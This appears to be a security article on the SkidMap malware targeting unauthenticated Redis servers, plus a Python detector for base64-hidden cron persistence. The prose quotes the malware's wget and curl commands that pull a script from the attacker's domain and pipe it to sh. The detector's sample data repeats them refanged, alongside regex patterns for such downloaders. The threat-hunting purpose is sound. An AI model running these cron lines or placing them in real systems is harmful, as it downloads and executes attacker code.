According to recent reports, threat actors have been using malware called “SkidMap” to compromise vulnerable Redis deployments.

Earlier versions of SkidMap mined cryptocurrency covertly and loaded malicious kernel modules (rootkits) that faked the system’s network traffic and CPU usage statistics so that the mining activity would go unnoticed.

The recent version, however, is considerably more sophisticated and targets only open Redis instances, i.e. instances reachable from the internet without authentication.

Further analysis of the new SkidMap variant shows that it adapts to the operating system it runs on and selects which binary to download based on the Linux distribution and architecture of the infected host.

Initially, the threat actor logs in to an open Redis instance and uses it to set up cron tasks: a Redis variable is populated with a base64-encoded string that decodes to two cron entries, one running wget (wget hxxp://z[.]shavsl[.]com/b -qO - | sh) and one running curl (curl -fsSL hxxp://z[.]shavsl[.]com/b | sh). Both run at a 10-minute interval and fetch the dropper scripts ‘b’, ‘c’ and ‘f’.
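The persistence pattern described above (a base64 blob stored in Redis that decodes to cron entries piping wget or curl output into sh every 10 minutes) is easy to hunt for. The following detector is an added example written for this article; it is not code from the report or from the malware. It decodes base64 runs found in a crontab or in a dumped Redis value, parses each cron line, and flags any scheduled download that is piped to a shell, marking hits on the domain named in the report (refanged to z.shavsl.com for matching) as a known indicator. The function and constant names, and the sample input, are constructed for the example.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Indicator named in the report (defanged there as z[.]shavsl[.]com).
KNOWN_C2_HOSTS = {"z.shavsl.com"}

# Runs of base64 text long enough to hold a cron line; the value the attacker
# stores in Redis is one such blob.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# A cron entry: five schedule fields followed by the command
# (@reboot/@daily shorthand is not handled in this example).
CRON_LINE = re.compile(r"^\s*((?:\S+\s+){5})(.+)$")

# "wget URL -qO - | sh" / "curl -fsSL URL | sh" style download-and-execute.
DOWNLOADER = re.compile(r"\b(wget|curl)\b[^|;&]*?(https?://\S+)", re.IGNORECASE)
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|da|z)?sh\b")


@dataclass
class Finding:
    schedule: str
    command: str
    downloader: Optional[str]
    url: Optional[str]
    host: Optional[str]
    interval_minutes: Optional[int]   # N for a "*/N" minute field, else None
    pipes_to_shell: bool
    known_c2: bool

    @property
    def suspicious(self) -> bool:
        # Any scheduled download piped into a shell is worth a look; a known
        # C2 host makes it a confirmed indicator.
        return self.known_c2 or (self.downloader is not None and self.pipes_to_shell)


def decode_base64_blobs(text: str) -> List[str]:
    """Return the decoded form of every base64 run in text that decodes to printable text."""
    decoded = []
    for m in B64_RUN.finditer(text):
        blob = m.group(0)
        blob += "=" * (-len(blob) % 4)          # tolerate stripped padding
        try:
            s = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        if all(c.isprintable() or c in "\n\r\t" for c in s):
            decoded.append(s)
    return decoded


def parse_cron_line(line: str) -> Optional[Finding]:
    """Parse one crontab line into a Finding, or None if it is not a job line."""
    if line.lstrip().startswith("#"):
        return None
    m = CRON_LINE.match(line)
    if not m:
        return None
    schedule, command = m.group(1).strip(), m.group(2).strip()
    first = schedule.split()[0]
    interval = int(first[2:]) if first.startswith("*/") and first[2:].isdigit() else None
    downloader = url = host = None
    d = DOWNLOADER.search(command)
    if d:
        downloader, url = d.group(1).lower(), d.group(2)
        host = re.sub(r"^https?://", "", url).split("/", 1)[0].split(":")[0].lower()
    return Finding(schedule, command, downloader, url, host, interval,
                   bool(PIPE_TO_SHELL.search(command)), host in KNOWN_C2_HOSTS)


def scan(text: str) -> List[Finding]:
    """Scan raw text, plus anything base64-encoded inside it, for download-and-execute cron jobs."""
    findings = []
    for chunk in [text, *decode_base64_blobs(text)]:
        for line in chunk.splitlines():
            f = parse_cron_line(line)
            if f is not None and f.suspicious:
                findings.append(f)
    return findings


# Constructed sample (not taken from the report): a benign crontab entry next to a
# Redis value holding the base64-encoded cron jobs described in the article.
BENIGN = "0 3 * * * /usr/local/bin/backup.sh --quiet\n"
MALICIOUS_CRON = (
    "*/10 * * * * wget http://z.shavsl.com/b -qO - | sh\n"
    "*/10 * * * * curl -fsSL http://z.shavsl.com/b | sh\n"
)
SAMPLE_REDIS_VALUE = base64.b64encode(MALICIOUS_CRON.encode()).decode()

if __name__ == "__main__":
    for f in scan(BENIGN + SAMPLE_REDIS_VALUE):
        label = "IOC" if f.known_c2 else "SUSPICIOUS"
        print(f"[{label}] every {f.interval_minutes} min: {f.downloader} {f.url} -> shell")
```

Run it against /var/spool/cron/* and /etc/cron.d/* on a suspect host, or against the output of a redis-cli GET on unfamiliar keys. The base64 decoding step matters because the malicious schedule never appears in clear text in the Redis value itself.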